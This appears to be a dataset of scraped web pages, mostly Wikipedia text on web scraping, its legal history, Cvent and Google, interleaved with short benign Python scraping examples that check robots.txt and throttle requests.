155 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Cvent,_Inc. | Cvent Holding Corp. is a Tysons Corner, Virginia-based company that provides software-as-a-service (SaaS) solutions for meetings, events, and hospitality management. Their web-based platform caters to in-person, virtual, and hybrid events, offering functionalities like online registration, venue selection, event management tools, and attendee engagement features. Cvent also provides software for hotels and venues to manage group bookings, including corporate travel, and source new group business. 4 Previously a public company, Cvent was acquired by investment firm Blackstone Inc. for $4.6 billion in June 2023. 3 5 Cvent is headquartered in Tysons Corner, Virginia, a suburb of Washington D.C., with other U.S. offices in Texas, Oregon, Utah, and Virginia. International Cvent offices include Canada, the United Kingdom, and India. Cvent traded on the Nasdaq Global Market under the stock symbol CVT prior to being taken private by Blackstone. 6 Cvent was founded in September 1999 by Reggie Aggarwal. 7 At its founding, Cvent had an initial staff of six individuals working in technology, business, and marketing. 8 Prior to co-founding Cvent in 1999, Reggie served as the president of the Indian CEO Network. 9 In 2018 and 2019 Reggie was named the number one influential SaaS CEO by the SaaS Report. 10 11 In 1999, Cvent received US$17 million in venture capital and grew its staff to 125 employees. 12 In April 2001, Cvent had 300 customers, including MCO WorldCom, McDonald's, Princeton University, University of Virginia, Ernst Young, and Hughes Network Systems. 13 Following the dot-com bubble burst and the September 11 attacks, Cvent faced near-bankruptcy and was forced to cut 80% of its staff. The company became profitable again in 2003. 14 In 2011, Cvent was growing by 50% a year and received $136 million of funding from New Enterprise Associates in July 2011, which, at the time, was the largest investment in a U.S. software company since 2007. 12 15 16 Cvent filed an S 1 with the U.S. Securities and Exchange Commission on July 8, 2013, proposing an initial public offering of 5.6 million shares. 17 The company went public on the New York Stock Exchange on August 9, 2013, at an initial price of $21. 17 18 Cvent raised $117.6 million and received a market capitalization of over $1 billion. The IPO was referenced in regard to its use of the JOBS Act, which enabled the company to quickly offer an IPO. 18 In 2016, the company was acquired by venture capital company Vista Equity Partners for $1.65 billion. 19 Ashok Trivedi, the co-founder of Mastech Digital and iGate was an early investor in the company. 20 On July 20, 2021, the WSJ reported that Cvent Nears $5 Billion-Plus SPAC(DGNS) Deal. 21 Following the close of a merger deal with Dragoneer Growth Opportunities Corp. II, a special purpose acquisition company (SPAC), Cvent went public on the Nasdaq Global Market. on December 9, 2021. 22 23 In March 2023, Cvent agreed to be taken private again by Blackstone Inc. in a $4.6 billion deal that includes a significant minority investment from the Abu Dhabi Investment Authority. 24 Cvent's current products are listed under three categories, Event Marketing Management, Exchange, and Suppliers Venues. 39 In July 2000, Cvent introduced its first SaaS product, a web-based tool for event planners to manage invitations and collect registration fees. 
13 40 In 2006, it introduced a product for conducting online surveys, which was followed by the introduction of the Cvent Supplier Network two years later. The Supplier Network is an online marketplace that connects meeting planners with venues and services. 41 42 In 2009, the company began offering professional services. 43 Cvent produces the Destination Guide, an online travel guide designed for meeting planners with information about 800 different destinations. 44 |
156 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Job_wrapping | Job wrapping is a term commonly used to describe a process by which jobs are captured from an employer's website and posted to the job boards on which the employer wants to advertise them. 1 Corporate recruiters and HR professionals who send job listings to multiple Internet employment sites can sometimes delegate those chores to the employment sites themselves under an arrangement called "job wrapping". Job wrapping ensures that employer job openings and updates get gathered regularly and posted on the job boards that the employer has designated. The term "job wrapping" is synonymous with "spidering", "scraping", or "mirroring". Job wrapping is generally done by a third-party vendor. |
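Although the entry above is only a stub, the capture-and-repost workflow it describes is easy to sketch with the libraries already used in this notebook. The careers-page markup and the output feed format below are purely hypothetical assumptions for illustration; a real employer site and job board would each define their own structure.

import json
from bs4 import BeautifulSoup

# Hypothetical careers-page markup; real employer sites will differ.
careers_html = """
<div class="job"><a href="/jobs/101">Data Analyst</a><span>Chicago, IL</span></div>
<div class="job"><a href="/jobs/102">Web Developer</a><span>Remote</span></div>
"""

soup = BeautifulSoup(careers_html, "html5lib")
jobs = []
for div in soup.find_all("div", class_="job"):
    link = div.find("a")
    jobs.append({
        "title": link.get_text(strip=True),
        "url": link["href"],
        "location": div.find("span").get_text(strip=True),
    })

# "Wrap" the captured openings into a feed that could be handed to a job board.
print(json.dumps(jobs, indent=2))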
157 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-15 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
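The fetch-then-extract workflow described above maps directly onto the libraries imported at the top of this notebook (requests, BeautifulSoup, pandas). A minimal sketch; the target URL and the choice of paragraph text as the unit of extraction are illustrative assumptions, not requirements:

import requests
import pandas as pd
from bs4 import BeautifulSoup

url = "https://en.wikipedia.org/wiki/Web_scraping"   # example target page

# Fetch: download the page, much as a browser would.
response = requests.get(url, headers={"User-Agent": "simple-demo-scraper"}, timeout=10)
response.raise_for_status()

# Extract: parse the HTML and keep the text of each non-empty paragraph.
soup = BeautifulSoup(response.text, "html5lib")
rows = [{"url": url, "paragraph": p.get_text(strip=True)}
        for p in soup.find_all("p") if p.get_text(strip=True)]

# Store: copy the extracted data into a structured form for later analysis.
df = pd.DataFrame(rows)
df.to_csv("scraped_paragraphs.csv", index=False)
print(df.head())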
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
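The grep/regular-expression approach mentioned at the start of this passage is straightforward to sketch with Python's standard-library re module. The pattern below, which pulls href attributes out of raw HTML, is deliberately simple and only meant as an illustration; regexes are a blunt tool for HTML, but they work for quick, narrow extractions.

import re
import requests
from urllib.parse import urljoin

base_url = "https://en.wikipedia.org/wiki/Web_scraping"   # example page
html = requests.get(base_url, timeout=10).text

# Capture the target of every href="..." attribute in the page source.
hrefs = re.findall(r'href="([^"]+)"', html)

# Resolve relative links against the page URL; urljoin is imported again here
# so the snippet stands on its own.
absolute_links = sorted({urljoin(base_url, h) for h in hrefs})
print(len(absolute_links), "distinct links found")
print(absolute_links[:5])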
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular web scraping tools include: BeautifulSoup, a Python library that provides simple methods for extracting data from HTML and XML files; Scrapy, an open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it; Octoparse, a no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills; ParseHub, another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites; Apify, a platform that offers a wide range of scraping tools and the ability to create custom scrapers; and InstantAPI.ai, an AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 
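Of the tools listed, BeautifulSoup is the one already used in this notebook. A self-contained example on an inline HTML snippet, requiring no network access; the table markup is invented for the demonstration.

from bs4 import BeautifulSoup

html = """
<html><body>
  <table id="prices">
    <tr><th>Item</th><th>Price</th></tr>
    <tr><td>Widget</td><td>$3.50</td></tr>
    <tr><td>Gadget</td><td>$7.25</td></tr>
  </table>
</body></html>
"""

soup = BeautifulSoup(html, "html5lib")
table = soup.find("table", id="prices")

# Walk the data rows (skipping the header) and collect (item, price) pairs.
records = []
for row in table.find_all("tr")[1:]:
    cells = [td.get_text(strip=True) for td in row.find_all("td")]
    if cells:
        records.append(tuple(cells))

print(records)   # [('Widget', '$3.50'), ('Gadget', '$7.25')]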
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA) and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the website's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked its IP addresses, and later sued in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use must be brought to the users' attention in order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping is a violation of contract law. It also violates the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
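The specific counter-measures were not captured in this extract, but whatever a site deploys, a well-behaved scraper can at least check robots.txt and throttle itself; Python's standard-library urllib.robotparser handles the first part. A sketch, assuming the target site publishes a robots.txt file and that a two-second delay is an acceptable crawl rate:

import time
import urllib.robotparser
import requests

robots = urllib.robotparser.RobotFileParser()
robots.set_url("https://en.wikipedia.org/robots.txt")
robots.read()

user_agent = "polite-demo-bot"
targets = [
    "https://en.wikipedia.org/wiki/Web_scraping",
    "https://en.wikipedia.org/wiki/Data_scraping",
]

for url in targets:
    if not robots.can_fetch(user_agent, url):
        print("robots.txt disallows", url)
        continue
    response = requests.get(url, headers={"User-Agent": user_agent}, timeout=10)
    print(url, response.status_code, len(response.text), "bytes")
    time.sleep(2)   # crude rate limiting to avoid hammering the server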
158 | https://en.wikipedia.org/wiki/Web_scraping | https://web.archive.org/web/20120624103316/http://www.lkshields.ie/htmdocs/publications/newsletters/update26/update26_03.htm | Website owners often have to contend with the activities of third-party 'screen-scrapers', who use 'web harvesting' software to extract information from companies' websites. But website owners are now in a stronger position thanks to a recent decision by Mr Justice Michael Hanna in the High Court in the case of Ryanair Limited v Billigfluege.de GmbH (26 February 2010). However, it should be noted that the decision is currently under appeal to the Supreme Court. The Ryanair case concerned a claim by Ryanair that the service offered by the Billigfluege website breached the terms of use and the trade mark, copyright and database rights of Ryanair's own website. Billigfluege operates a price comparison website that allows users of its website to compare prices of flights. In order to provide this service, Billigfluege takes information from Ryanair's website (without Ryanair's consent), an activity known as 'screen-scraping', and provides that information to its users for a fee. Mr Justice Hanna's decision relates only to a preliminary issue as to whether the case should be heard in Ireland or Germany. It is not a full decision on the allegation of screen-scraping or the other issues that are before the court. In any dispute, there is an initial issue that must always be determined: where should a defendant be sued? Billigfluege, a German-based company, argued that it was not appropriate that proceedings be brought in Ireland and that proceedings should instead be brought in Germany. Ryanair claimed that, by entering the Ryanair website and extracting content from it, Billigfluege agreed to be bound by Ryanair's terms of use, which contained a provision that Irish courts had exclusive jurisdiction over all disputes. Billigfluege denied that there was any contract in existence between it and Ryanair. The court had to decide the issue. The court noted that it was a well-established general principle of law that parties to a contract cannot be bound by terms that they have not had the opportunity of reading prior to making the contract. But it added that this does not mean that a party will not be bound simply because it has not read the terms. In the Ryanair case, the clause conferring exclusive jurisdiction on the Irish courts was contained in the terms of use on Ryanair's website, highlighted by way of a hyperlink. The court found that the terms of use on Ryanair's website were fairly brought to the attention of the other party, and it ruled in favour of Ryanair that the exclusive jurisdiction clause was binding on Billigfluege. Billigfluege also argued that, regardless of the validity of the terms of use, it did not use Ryanair's website; rather, its customers did. The court held that Billigfluege is a commercial entity which engaged with the Ryanair website for the purposes of gleaning or scraping information from it for onward transmission to its own customers. The court said that to claim this is not 'use' of the Ryanair website was an exercise in semantics and an unconvincing argument.
The court will now hear the full case and determine whether Billigfluege infringed Ryanair's intellectual property rights and/or breached its terms of use as a result of the alleged screen-scraping activity. The main point to take from this decision is that if you are a website owner and you wish to prevent your content from being misappropriated by third parties, whether you are an airline operator, a job recruitment website or an operator of any other form of online sales activity, it is imperative that your terms of use be comprehensive and up to date to ensure that you are appropriately protected. The terms of use must be fairly brought to the attention of the other party, meaning that the terms must be brought to the customer's attention in such a manner that they are incorporated into the contract. We recommend that your terms of use, and the manner in which they are displayed on your website, be reviewed periodically to ensure that your business is protected. For further information please contact Áine Matthews. |
159 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:CS1_maint:_multiple_names:_authors_list | This is a hidden tracking category for CS1 citations that use author , or its aliases where Module:Citation CS1 identifies cs1 2 citation templates that appear to use singular forms of author name-list parameters to list multiple authors' names. Doing so corrupts the citation's metadata. The citation module code looks for multiple comma or semicolon separator characters in the value assigned to author , last , their aliases, and enumerated equivalents (e.g. author2 , last2 , etc.). This test displays an error message for multiple authors' names in a single parameter, as well as single author names that include a comma-separated list of post-nominals: author FC White, RN, MD, Ph.D. To fix these errors in citations: Editors should not simply replace author with authors . Using the plural authors parameter to replace a singular author or last parameter that holds multiple authors' names is discouraged because automatically decoding lists of human names is an extraordinarily difficult task. Because of this difficulty, names listed in authors are omitted from the template's COinS metadata. Enumerating the author list with authorn , or lastn firstn , or, where appropriate, vauthors , preserves the associated metadata. Pages in this category should only be added by Module:Citation CS1. Pages with this condition are automatically placed in Category:CS1 maint: multiple names: authors list. a By default, Citation Style 1 and Citation Style 2 error messages are visible to all readers and maintenance messages are hidden from all readers. To display maintenance messages in the rendered article, include the following text in your common CSS page (common.css) or your specific skin's CSS page and (skin.css). (Note to new editors: those CSS pages are specific to you, and control your view of pages, by adding to your user account's CSS code. If you have not yet created such a page, then clicking one of the .css links above will yield a page that starts "Wikipedia does not have a user page with this exact name. Click the "Start the User:username filename page" link, paste the text below, save the page, follow the instructions at the bottom of the new page on bypassing your browser's cache, and finally, in order to see the previously hidden maintenance messages, refresh the page you were editing earlier.) To display hidden-by-default error messages: Even with this CSS installed, older pages in Wikipedia's cache may not have been updated to show these error messages even though the page is listed in one of the tracking categories. A null edit will resolve that issue. After (error and maintenance) messages are displayed, it might still not be easy to find them in a large article with a lot of citations. Messages can then be found by searching (with Ctrl-F) for (help) or "cs1". To hide normally-displayed error messages: You can personalize the display of these messages (such as changing the color), but you will need to ask someone who knows CSS or at the technical village pump if you do not understand how. Nota bene: these CSS rules are not obeyed by Navigation popups. They also do not hide script warning messages in the Preview box that begin with "This is only a preview; your changes have not yet been saved". The following 200 pages are in this category, out of approximately 73,350 total. This list may not reflect recent changes. This category contains only the following file. |
160 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Google | Google LLC ( u l GOO-gh l) is an American multinational corporation and technology company focusing on online advertising, search engine technology, cloud computing, computer software, quantum computing, e-commerce, consumer electronics, and artificial intelligence (AI). 9 It has been referred to as "the most powerful company in the world" 10 and is one of the world's most valuable brands due to its market dominance, data collection, and technological advantages in the field of AI. 11 12 13 Google's parent company, Alphabet Inc., is one of the five Big Tech companies, alongside Amazon, Apple, Meta, and Microsoft. Google was founded on September 4, 1998, by American computer scientists Larry Page and Sergey Brin while they were PhD students at Stanford University in California. Together, they own about 14% of its publicly listed shares and control 56% of its stockholder voting power through super-voting stock. The company went public via an initial public offering (IPO) in 2004. In 2015, Google was reorganized as a wholly owned subsidiary of Alphabet Inc. Google is Alphabet's largest subsidiary and is a holding company for Alphabet's internet properties and interests. Sundar Pichai was appointed CEO of Google on October 24, 2015, replacing Larry Page, who became the CEO of Alphabet. On December 3, 2019, Pichai also became the CEO of Alphabet. 14 The company has since rapidly grown to offer a multitude of products and services beyond Google Search, many of which hold dominant market positions. These products address a wide range of use cases, including email (Gmail), navigation (Waze Maps), cloud computing (Cloud), web navigation (Chrome), video sharing (YouTube), productivity (Workspace), operating systems (Android), cloud storage (Drive), language translation (Translate), photo storage (Photos), videotelephony (Meet), smart home (Nest), smartphones (Pixel), wearable technology (Pixel Watch Fitbit), music streaming (YouTube Music), video on demand (YouTube TV), AI (Google Assistant Gemini), machine learning APIs (TensorFlow), AI chips (TPU), and more. Discontinued Google products include gaming (Stadia), Glass, Google , Reader, Play Music, Nexus, Hangouts, and Inbox by Gmail. 15 16 Google's other ventures outside of internet services and consumer electronics include quantum computing (Sycamore), self-driving cars (Waymo, formerly the Google Self-Driving Car Project), smart cities (Sidewalk Labs), and transformer models (Google DeepMind). 17 Google and YouTube are the two most-visited websites worldwide followed by Facebook and X (formerly known as Twitter). Google is also the largest search engine, mapping and navigation application, email provider, office suite, online video platform, photo and cloud storage provider, mobile operating system, web browser, machine learning framework, and AI virtual assistant provider in the world as measured by market share. 18 On the list of most valuable brands, Google is ranked second by Forbes 19 and fourth by Interbrand. 20 It has received significant criticism involving issues such as privacy concerns, tax avoidance, censorship, search neutrality, antitrust and abuse of its monopoly position. On August 5, 2024, D.C. Circuit Court Judge Amit P. Mehta ruled that Google held an illegal monopoly over Internet search. 
21 Google began in January 1996 as a research project by Larry Page and Sergey Brin while they were both PhD students at Stanford University in California. 22 23 24 The project initially involved an unofficial "third founder", Scott Hassan, the original lead programmer who wrote much of the code for the original Google Search engine, but he left before Google was officially founded as a company; 25 26 Hassan went on to pursue a career in robotics and founded the company Willow Garage in 2006. 27 28 While conventional search engines ranked results by counting how many times the search terms appeared on the page, they theorized about a better system that analyzed the relationships among websites. 29 They called this algorithm PageRank; it determined a website's relevance by the number of pages, and the importance of those pages that linked back to the original site. 30 31 Page told his ideas to Hassan, who began writing the code to implement Page's ideas. 25 Page and Brin would also use their friend Susan Wojcicki's garage as their office when the search engine was set up in 1998. 32 Page and Brin originally nicknamed the new search engine "BackRub", because the system checked backlinks to estimate the importance of a site. 22 33 34 Hassan as well as Alan Steremberg were cited by Page and Brin as being critical to the development of Google. Rajeev Motwani and Terry Winograd later co-authored with Page and Brin the first paper about the project, describing PageRank and the initial prototype of the Google search engine, published in 1998. H ctor Garc a-Molina and Jeffrey Ullman were also cited as contributors to the project. 35 PageRank was influenced by a similar page-ranking and site-scoring algorithm earlier used for RankDex, developed by Robin Li in 1996, with Larry Page's PageRank patent including a citation to Li's earlier RankDex patent; Li later went on to create the Chinese search engine Baidu. 36 37 Eventually, they changed the name to Google; the name of the search engine was a misspelling of the word googol, 22 38 39 a very large number written 10100 (1 followed by 100 zeros), picked to signify that the search engine was intended to provide large quantities of information. 40 Google was initially funded by an August 1998 investment of $100,000 from Andy Bechtolsheim, 22 co-founder of Sun Microsystems. This initial investment served as a motivation to incorporate the company to be able to use the funds. 42 43 Page and Brin initially approached David Cheriton for advice because he had a nearby office in Stanford, and they knew he had startup experience, having recently sold the company he co-founded, Granite Systems, to Cisco for $220 million. David arranged a meeting with Page and Brin and his Granite co-founder Andy Bechtolsheim. The meeting was set for 8 a.m. at the front porch of David's home in Palo Alto and it had to be brief because Andy had another meeting at Cisco, where he now worked after the acquisition, at 9 a.m. Andy briefly tested a demo of the website, liked what he saw, and then went back to his car to grab the check. David Cheriton later also joined in with a $250,000 investment. 44 45 Google received money from two other angel investors in 1998: Amazon.com founder Jeff Bezos, and entrepreneur Ram Shriram. 46 Page and Brin had first approached Shriram, who was a venture capitalist, for funding and counsel, and Shriram invested $250,000 in Google in February 1998. Shriram knew Bezos because Amazon had acquired Junglee, at which Shriram was the president. 
It was Shriram who told Bezos about Google. Bezos asked Shriram to meet Google's founders and they met six months after Shriram had made his investment when Bezos and his wife were on a vacation trip to the Bay Area. Google's initial funding round had already formally closed but Bezos' status as CEO of Amazon was enough to persuade Page and Brin to extend the round and accept his investment. 47 48 Between these initial investors, friends, and family Google raised around $1,000,000, which is what allowed them to open up their original shop in Menlo Park, California. 49 Craig Silverstein, a fellow PhD student at Stanford, was hired as the first employee. 24 50 51 After some additional, small investments through the end of 1998 to early 1999, 46 a new $25 million round of funding was announced on June 7, 1999, 52 with major investors including the venture capital firms Kleiner Perkins and Sequoia Capital. 43 Both firms were initially reticent about investing jointly in Google, as each wanted to retain a larger percentage of control over the company to themselves. Larry and Sergey however insisted on taking investments from both. Both venture companies finally agreed to investing jointly $12.5 million each due to their belief in Google's great potential and through the mediation of earlier angel investors Ron Conway and Ram Shriram who had contacts in the venture companies. 53 In March 1999, the company moved its offices to Palo Alto, California, 54 which is home to several prominent Silicon Valley technology start-ups. 55 The next year, Google began selling advertisements associated with search keywords against Page and Brin's initial opposition toward an advertising-funded search engine. 56 24 To maintain an uncluttered page design, advertisements were solely text-based. 57 In June 2000, it was announced that Google would become the default search engine provider for Yahoo , one of the most popular websites at the time, replacing Inktomi. 58 59 In 2003, after outgrowing two other locations, the company leased an office complex from Silicon Graphics, at 1600 Amphitheatre Parkway in Mountain View, California. 61 The complex became known as the Googleplex, a play on the word googolplex, the number one followed by a googol of zeroes. Three years later, Google bought the property from SGI for $319 million. 62 By that time, the name "Google" had found its way into everyday language, causing the verb "google" to be added to the Merriam-Webster Collegiate Dictionary and the Oxford English Dictionary, denoted as: "to use the Google search engine to obtain information on the Internet". 63 64 The first use of the verb on television appeared in an October 2002 episode of Buffy the Vampire Slayer. 65 Additionally, in 2001 Google's investors felt the need to have a strong internal management, and they agreed to hire Eric Schmidt as the chairman and CEO of Google. 49 Eric was proposed by John Doerr from Kleiner Perkins. He had been trying to find a CEO that Sergey and Larry would accept for several months, but they rejected several candidates because they wanted to retain control over the company. Michael Moritz from Sequoia Capital at one point even menaced requesting Google to immediately pay back Sequoia's $12.5m investment if they did not fulfill their promise to hire a chief executive officer, which had been made verbally during investment negotiations. 
